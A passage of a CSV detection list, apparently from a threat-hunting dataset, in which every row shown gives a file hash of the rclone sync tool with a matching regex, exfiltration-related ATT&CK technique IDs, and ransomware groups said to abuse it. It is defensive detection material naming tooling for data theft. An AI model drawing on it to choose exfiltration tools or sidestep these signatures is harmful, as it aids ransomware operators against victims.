services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9fa3d83395b5d3ed3b9ab096aababbbddd71ebf90ae37ddfd24f168d9f909bad*",".{0,1000}9fa3d83395b5d3ed3b9ab096aababbbddd71ebf90ae37ddfd24f168d9f909bad.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9fc2a410869d7c8ec6e01cccc1b5013b512a22982bc9675ff2f6443976f1b59b*",".{0,1000}9fc2a410869d7c8ec6e01cccc1b5013b512a22982bc9675ff2f6443976f1b59b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*9fefe059c5e2a23b4f92bc8b292f5942543a28e265bf06f123686483a8241b4a*",".{0,1000}9fefe059c5e2a23b4f92bc8b292f5942543a28e265bf06f123686483a8241b4a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a0d678feb4b1d5460a2b6dc94cbf1168db92da55a52064d452f6046f6fb8b3ab*",".{0,1000}a0d678feb4b1d5460a2b6dc94cbf1168db92da55a52064d452f6046f6fb8b3ab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a111d393d4f49bc4f3969a399962a576f142f58ea165f84186970e24e5c9eeba*",".{0,1000}a111d393d4f49bc4f3969a399962a576f142f58ea165f84186970e24e5c9eeba.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a12da8d4bdf8a29cdb41d332b700ac882f5d9c2352cb7696636e56ecbae3a883*",".{0,1000}a12da8d4bdf8a29cdb41d332b700ac882f5d9c2352cb7696636e56ecbae3a883.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a17504a9ca029f89214959636206e22292ed49c26a28dd530a883c12d9ac1977*",".{0,1000}a17504a9ca029f89214959636206e22292ed49c26a28dd530a883c12d9ac1977.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a1a3bb9524011ce83b48f12ef28ad35dbf7f6022a8875a040d4c5d0dc982458a*",".{0,1000}a1a3bb9524011ce83b48f12ef28ad35dbf7f6022a8875a040d4c5d0dc982458a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a1fb68b35a61692176728a943a95433fb26263a3a6439239a122eb6e6918d2cd*",".{0,1000}a1fb68b35a61692176728a943a95433fb26263a3a6439239a122eb6e6918d2cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a21da11f4b13fe90291c32e009c9aa97784650634b8be5db08d075a43453b72d*",".{0,1000}a21da11f4b13fe90291c32e009c9aa97784650634b8be5db08d075a43453b72d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a226d27b749d8376ceb696401bd3186e9942d5ed055aba2a37cff5d835aa510a*",".{0,1000}a226d27b749d8376ceb696401bd3186e9942d5ed055aba2a37cff5d835aa510a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a2325e3fae41452930747860e4bcc8e6767b55d041788a4e1d583ec1c63ed648*",".{0,1000}a2325e3fae41452930747860e4bcc8e6767b55d041788a4e1d583ec1c63ed648.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a237c330ee6a0a63a4604457b51440f9b34b8782a044ee247d8eba0bb4353dda*",".{0,1000}a237c330ee6a0a63a4604457b51440f9b34b8782a044ee247d8eba0bb4353dda.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a26d3db2560ca9d7c85ba716c7df74d53a6a10166ab88f338a73a19bf4ea04d8*",".{0,1000}a26d3db2560ca9d7c85ba716c7df74d53a6a10166ab88f338a73a19bf4ea04d8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a2832e8890afc52378378b32a90719a1183d1323c957a87c54fcd9329e702033*",".{0,1000}a2832e8890afc52378378b32a90719a1183d1323c957a87c54fcd9329e702033.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a2ca44232694b093a519194ef60da00ba8a0ab33de579105c1945b9dc00097cc*",".{0,1000}a2ca44232694b093a519194ef60da00ba8a0ab33de579105c1945b9dc00097cc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a34e20b1abe27f830bdc259a6d9813a521bab31004cc9de8924fbc9833d9f3f5*",".{0,1000}a34e20b1abe27f830bdc259a6d9813a521bab31004cc9de8924fbc9833d9f3f5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a3f300ec99b3dc8666396091067c8a7ccc224d05d1ce67f66b67f88cd0d3b279*",".{0,1000}a3f300ec99b3dc8666396091067c8a7ccc224d05d1ce67f66b67f88cd0d3b279.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a40a7980c5fbe507c565bfd7dc5ce979b287ace92ffacb4e5209deef2d2bf5fa*",".{0,1000}a40a7980c5fbe507c565bfd7dc5ce979b287ace92ffacb4e5209deef2d2bf5fa.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a460000e3b3b1aa7da1909db5743f6b90b4df8ca8ead740e47136d3abeffbaec*",".{0,1000}a460000e3b3b1aa7da1909db5743f6b90b4df8ca8ead740e47136d3abeffbaec.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a4ea0ed17ef1028ac4a9f18bc7fc1aae6e3dd741cdaee8c073c66b8316ba2fc1*",".{0,1000}a4ea0ed17ef1028ac4a9f18bc7fc1aae6e3dd741cdaee8c073c66b8316ba2fc1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a55808e01d6b1dfb6776665e566a8e434b0ff2846451909fd8748a7ce0d4c031*",".{0,1000}a55808e01d6b1dfb6776665e566a8e434b0ff2846451909fd8748a7ce0d4c031.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a55f8d6661a379fe2992f0054da97667d021f6bcbc5a5aa6c5b91828e8112711*",".{0,1000}a55f8d6661a379fe2992f0054da97667d021f6bcbc5a5aa6c5b91828e8112711.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a56d026e58a0dd62c8104fc9deb5a60ab7a531ae657a950f5f4fa8bc9765931e*",".{0,1000}a56d026e58a0dd62c8104fc9deb5a60ab7a531ae657a950f5f4fa8bc9765931e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a59970f075f30ba38301eb4eafd5eb0149f86c84649c99488394d4e01d08aa25*",".{0,1000}a59970f075f30ba38301eb4eafd5eb0149f86c84649c99488394d4e01d08aa25.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a5cde52a2ed2746ee659faac3008f1cdfdc0c6bf3d13d1a673cf4ebdbbd7cbe1*",".{0,1000}a5cde52a2ed2746ee659faac3008f1cdfdc0c6bf3d13d1a673cf4ebdbbd7cbe1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a63ba98cc13645f84549367e1a0d5efb18da9fb0d7203c3c1c3f366331204758*",".{0,1000}a63ba98cc13645f84549367e1a0d5efb18da9fb0d7203c3c1c3f366331204758.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a6adb2db09d7d3a546e55248375ec27eb235caff4707c3e5c5c669f5365edbb1*",".{0,1000}a6adb2db09d7d3a546e55248375ec27eb235caff4707c3e5c5c669f5365edbb1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a6f3ff605f199266c8472781574921fed6c22885666216ad0ce41e2ed3cf404b*",".{0,1000}a6f3ff605f199266c8472781574921fed6c22885666216ad0ce41e2ed3cf404b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a71ed4cf45715b2934a723bdf6342b23fa7c467fc374d54e7f94fbd817829a6e*",".{0,1000}a71ed4cf45715b2934a723bdf6342b23fa7c467fc374d54e7f94fbd817829a6e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a729d963fcf9c8fa5dab77203d950fe091b15477c8ec598e5604acb2e191c8cf*",".{0,1000}a729d963fcf9c8fa5dab77203d950fe091b15477c8ec598e5604acb2e191c8cf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a748cb077987a0a404222a7a817c2326b42cd55d24e3c0a03ebfa06176a1c28d*",".{0,1000}a748cb077987a0a404222a7a817c2326b42cd55d24e3c0a03ebfa06176a1c28d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a7e554c6cc81ad47e14924815e282b319b5c877aa05aad093eafb8252a940af3*",".{0,1000}a7e554c6cc81ad47e14924815e282b319b5c877aa05aad093eafb8252a940af3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a8135d2e58969e12d4bd99bbd3bd8866fca9a151b4cb6a0615e602dd9cfa5e3a*",".{0,1000}a8135d2e58969e12d4bd99bbd3bd8866fca9a151b4cb6a0615e602dd9cfa5e3a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*a81eb95cde4ef661850546c816e9884b8adabf279a84e779b4e0b6bf6a02649e*",".{0,1000}a81eb95cde4ef661850546c816e9884b8adabf279a84e779b4e0b6bf6a02649e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
